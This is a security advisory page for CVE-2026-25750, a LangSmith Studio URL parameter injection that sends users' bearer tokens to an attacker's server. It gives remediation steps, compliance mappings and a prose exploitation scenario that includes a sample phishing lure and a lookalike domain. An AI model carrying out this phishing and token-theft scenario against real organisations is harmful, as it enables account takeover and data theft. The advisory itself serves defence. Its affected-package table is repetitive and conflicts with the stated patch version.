CVE-2026-25750 — HIGH (CVSS 8.1) AI Security Vulnerability

CISO Take

Any organization running LangSmith — cloud or self-hosted — for monitoring LangChain/AI agent pipelines is exposed until upgraded to Helm chart 0.12.71. A single phishing link harvests a bearer token granting full workspace access: traces, prompts, datasets, and any credentials embedded in LLM call logs. Upgrade immediately; if self-hosted, treat this as a critical patch given the direct path to AI pipeline exfiltration.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
langsmith	pip	—	No patch
langsmith	pip	—	No patch
langsmith	pip	—	No patch
langsmith	pip	—	No patch

Severity & Risk

CVSS 3.1

8.1 / 10

EPSS

N/A

KEV Status

Not in KEV

Sophistication

Trivial

Recommended Action

1. PATCH: Upgrade langchain-ai/helm to >= 0.12.71 immediately. For self-hosted, this is the only fix — no workaround exists per vendor advisory. 2. AUDIT: Review LangSmith workspace access logs for any anomalous API calls originating from unexpected IPs in the past 90 days. 3. ROTATE: Rotate all LangSmith API keys and user tokens as a precaution. 4. SCAN TRACES: Audit recent LangSmith traces for inadvertently logged credentials, PII, or sensitive prompts that may now be considered compromised. 5. PHISHING DEFENSE: Brief development and ML teams on this specific attack vector — malicious LangSmith URLs are indistinguishable from legitimate ones without inspecting the baseUrl parameter. 6. DETECTION: Alert on LangSmith authentication from new geographies or user agents within the 5-minute token validity window. 7. ZERO-TRUST: Enforce network-level restrictions on LangSmith instances (allowlist known CI/CD and developer IPs).

Classification

Prompt Injection Data Leakage Code Execution Framework Agent API AML.T0011.003 - Malicious Link AML.T0012 - Valid Accounts AML.T0025 - Exfiltration via Cyber Means AML.T0035 - AI Artifact Collection AML.T0049 - Exploit Public-Facing Application AML.T0052 - Phishing AML.T0085 - Data from AI Services AML.T0087 - Gather Victim Identity Information AML.T0091.000 - Application Access Token

Compliance Impact

This CVE is relevant to:

EU AI Act

Art.15 - Accuracy, robustness and cybersecurity Art.9 - Risk management system Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system

ISO 42001

A.6.2.3 - Access control for AI systems A.6.2.6 - Information security in AI system lifecycle A.9.2 - AI system incident management A.9.4 - AI system security

NIST AI RMF

GOVERN 1.2 - Accountability mechanisms are in place GOVERN 6.1 - AI risk policies for third-party dependencies MANAGE 2.2 - Mechanisms to sustain AI risk management

OWASP LLM Top 10

LLM02 - Sensitive Information Disclosure LLM02:2025 - Sensitive Information Disclosure LLM03 - Supply Chain Vulnerabilities LLM03:2025 - Supply Chain Vulnerabilities

Technical Details

NVD Description

Langchain Helm Charts are Helm charts for deploying Langchain applications on Kubernetes. Prior to langchain-ai/helm version 0.12.71, a URL parameter injection vulnerability existed in LangSmith Studio that could allow unauthorized access to user accounts through stolen authentication tokens. The vulnerability affected both LangSmith Cloud and self-hosted deployments. Authenticated LangSmith users who clicked on a specially crafted malicious link would have their bearer token, user ID, and workspace ID transmitted to an attacker-controlled server. With this stolen token, an attacker could impersonate the victim and access any LangSmith resources or perform any actions the user was authorized to perform within their workspace. The attack required social engineering (phishing, malicious links in emails or chat applications) to convince users to click the crafted URL. The stolen tokens expired after 5 minutes, though repeated attacks against the same user were possible if they could be convinced to click malicious links multiple times. The fix in version 0.12.71 implements validation requiring user-defined allowed origins for the baseUrl parameter, preventing tokens from being sent to unauthorized servers. No known workarounds are available. Self-hosted customers must upgrade to the patched version.

Exploitation Scenario

A threat actor targeting an organization's AI pipeline begins by identifying LangSmith usage via job postings referencing LangChain or public GitHub repositories. The attacker registers a lookalike domain (e.g., langsmith-security-notice.com) and sets up a token capture endpoint. They craft a LangSmith URL with the vulnerable baseUrl parameter pointing to their server and embed it in a spearphishing email: 'Action required: your LangSmith workspace has been flagged for unusual activity — verify your account.' A developer or ML engineer clicks the link; their browser silently transmits the bearer token, user ID, and workspace ID to the attacker's server. Within 5 minutes, the attacker authenticates to LangSmith, exports all traces (extracting embedded OpenAI/Anthropic API keys from logged headers), downloads evaluation datasets, and maps the organization's complete AI system architecture from run metadata. If the attack is detected and the token expires, the attacker can repeat the phishing attempt — the vulnerability requires no elevated access to exploit repeatedly.

Weaknesses (CWE)

CWE-74 Primary

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

References

Timeline

Published

March 4, 2026

Last Modified

March 18, 2026

First Seen

March 4, 2026